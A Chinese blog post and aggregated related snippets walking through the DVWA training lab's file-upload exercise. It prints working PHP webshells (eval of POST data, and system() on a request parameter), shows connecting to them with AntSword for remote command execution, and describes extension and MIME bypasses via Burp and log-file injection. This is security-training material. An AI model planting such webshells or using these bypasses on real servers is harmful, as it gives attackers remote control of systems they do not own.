【DVWA】——File Upload(文件上传)

最新推荐文章于 2025-07-02 11:35:00 发布
原创 最新推荐文章于 2025-07-02 11:35:00 发布 · 1.4k 阅读 · 16 ·
CC 4.0 BY-SA版权
❗ 转载请注明出处 作者:HinsCoder 博客链接:https://blog.youkuaiyun.com/HinsCoder
文章标签:

#测试 #学习 #笔记 #安全测试 #渗透测试 #DVWA #文件上传

📖 前言:文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。

目录

🕒 1. Low

满足这三个条件,攻击者就能够成功入侵

  • 木马上传成功,未被杀;
  • 知道木马的路径在哪;
  • 上传的木马能正常运行(解析)。

没有任何限制,所以直接上传一句简短代码(一句话木马)即可

<?php @eval($_POST['csb']);
echo "vulnerable";
?>

在这里插入图片描述
在这里插入图片描述

接下来需要用到一款Shell控制工具——中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。简而言之,中国蚁剑是一款的shell控制端软件。

🔎 中国蚁剑

第一次安装项目需要先初始化,我们解压到下面的文件夹

AntSword-Loader-v4.0.3-win32-x64\antSword-master

初始化完成后打开,首先右键空白处,点击添加数据

在这里插入图片描述
将上传的URL添加进去

http://192.168.31.57:8080/hackable/uploads/webshell.php

在这里插入图片描述

密码就是刚才后门的密码:csb,测试连接成功后即可添加

在这里插入图片描述

双击该URL地址,可以看到起其目录文件信息,随后右键在此处打开终端

在这里插入图片描述

在这里插入图片描述

此时就可以随意输入指令,实现远控了。

🕒 2. Medium

在这里插入图片描述
可以看到,靶场对文件类型做了限制,只允许上传png、jpeg

此时我们可以把一句话木马改为png后缀

在这里插入图片描述

然后使用BP抓包,将文件后缀改成php

在这里插入图片描述

在这里插入图片描述
使用webshell连接同上。

OK,以上就是本期知识点“File Upload(文件上传)”的知识啦~~ ,感谢友友们的阅读。后续还会继续更新,欢迎持续关注哟📌~
💫如果有错误❌,欢迎批评指正呀👀~让我们一起相互进步🚀
🎉如果觉得收获满满,可以点点赞👍支持一下哟~

❗ 转载请注明出处
作者:HinsCoder
博客链接:🔎 作者博客主页

DVWA--file upload文件上传
weixin_50342860的博客
08-23 1616
目录风险lowmediumhigh总结 风险 对上传的文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA——File Upload
qq_54448882的博客
11-09 3272
此文章仅供学习使用,请勿用作违法行为。 目录 简介 文件上传漏洞 Webshell(网页后门) 造成文件上传漏洞的主要原因 危害 Low 上传一句话木马 使用蚁剑连接 Medium 上传一句话木马 拦截信息改变上传文件类型 蚁剑连接 简介: 文件上传漏洞: 文件上传漏洞主要攻击web服务,有文件上传存在的地方都有可能存在文件上传的漏洞,但并不是所有地方都存在这个漏洞。漏洞是否存在取决于对方的代码的完整性,若某些验证代码存在疏忽,就很可能造成文件上传漏洞。例...
DVWA保姆级通关教程--05文件上传
m0_74020575的博客
05-08 1808
文件上传漏洞是Web安全中一种常见的漏洞,其本质是攻击者通过上传恶意文件(如脚本文件、木马、WebShell等)到服务器,绕过服务器的安全检测并被执行,最终实现远程命令执行、控制服务器或窃取数据等恶意操作。提示:以下是本篇文章正文内容,下面案例可供参考。
DVWA靶场通关笔记-文件上传(Low级别)
mooyuan的网络安全博客
07-02 892
本系列为通过《DVWA靶场通关笔记》的文件上传关卡(low,medium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为文件上传Low级别关卡的渗透部分。
DVWA靶场-----FIle Upload文件上传
m0_65712192的博客
11-14 5649
DVWA靶场-----FIle Upload文件上传
DVWA-File Upload(文件上传)
简简的博客
02-02 577
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA-文件上传File Upload
weixin_58954236的博客
08-20 1695
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA-File Upload(Medium)
七月_的博客
10-23 395
文章目录File Upload(Medium)代码分析 File Upload(Medium) 代码分析 ```php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/u...
DVWA系列——File Upload文件上传
weixin_49340699的博客
12-12 1245
DVWA系列——File Upload文件上传)简介low级别源码分析上传木马打开中国菜刀进行连接medium源码分析破解思路high源码分析破解思路方法一方法二impossible 简介 File Upload文件上传漏洞,通常是由于对上传文件的类型内容没有进行严格的过滤检查使得可以上传webshell获取服务器权限,所以文件上传漏洞带来的危害也是毁灭性的。 low级别 源码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are
Kali渗透测试DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 6278
一、File Upload文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA——文件上传
m0_74426634的博客
04-07 1189
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
代码审计——DVWA File Upload文件上传
z1756227332的博客
03-10 444
Low等级代码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES...
DVWAFile Upload文件上传
RexHa的博客
10-02 2945
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA文件上传
qq_62078839的博客
04-03 3813
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA 文件上传
m0_56107268的博客
04-30 2162
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
5、DVWA——文件上传
qq_55202378的博客
09-11 1467
DVWA 文件上传
DVWA文件上传File Upload
qq_39682037的博客
03-21 2726
文件上传File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA靶场系列(四)—— File Upload文件上传
qq_45612828的博客
07-12 6282
DVWA靶场系列(四)—— File Upload文件上传
dvwa靶场 文件上传漏洞
最新发布
07-15
DVWA靶场中,文件上传漏洞的利用是学习渗透测试的重要实践之一。该漏洞的核心在于应用程序未能正确验证用户上传的文件类型或内容,导致攻击者可以上传恶意文件(如WebShell)并执行任意代码。 ### 文件上传漏洞原理 文件上传功能通常用于允许用户将文件传输到服务器,例如头像上传、附件上传等。如果后端未对上传的文件进行严格的检查和过滤,攻击者可以通过构造特定的请求上传包含恶意代码的文件,并通过访问该文件来触发恶意行为[^2]。 ### 漏洞利用方法 1. **绕过前端验证** 前端验证通常使用JavaScript限制文件类型(如仅允许图片格式)。攻击者可以通过浏览器开发者工具禁用JavaScript或直接修改请求数据包来绕过这些限制。 2. **绕过后端验证** 后端可能通过检查文件扩展名、MIME类型或文件内容来阻止非授权文件上传。常见的绕过方式包括: - 使用双扩展名(如 `shell.php.jpg`),某些服务器配置会优先解析第一个扩展名。 - 修改MIME类型为图像类型(如 `image/jpeg`)以欺骗服务器。 - 在图片文件中嵌入PHP代码并使用文件包含漏洞调用它。 3. **上传WebShell** 构造一个简单的PHP WebShell文件,内容如下: ```php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; } ?> ``` 将此文件保存为 `shell.php` 并尝试上传。成功上传后,可以通过访问该文件并传入命令参数(如 `?cmd=ipconfig`)来执行系统命令。 4. **提权与持久化控制** 一旦获得远程代码执行权限,可以进一步下载更高级的WebShell或尝试提权获取更高的系统权限。 ### 实践指南 - **设置DVWA环境** 确保已安装XAMPP或WAMP等本地服务器环境,并配置好DVWA平台。登录DVWA后,进入“File Upload”模块。 - **设置安全等级** DVWA提供了不同级别的安全设置(Low、Medium、High、Impossible)。建议从Low级别开始练习,逐步挑战更高难度。 - **使用Burp Suite抓包分析** 使用Burp Suite拦截上传请求,观察原始HTTP请求结构,尝试修改文件名、MIME类型等字段以绕过服务器检测。 - **日志文件注入** 如果无法直接上传PHP文件,可以尝试将PHP代码写入服务器日志文件(如访问日志),然后通过文件包含漏洞加载并执行它。 - **防御建议** 了解如何防御文件上传漏洞同样重要。最佳实践包括:限制上传目录权限、使用白名单机制验证文件类型、重命名上传文件、禁止脚本执行等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值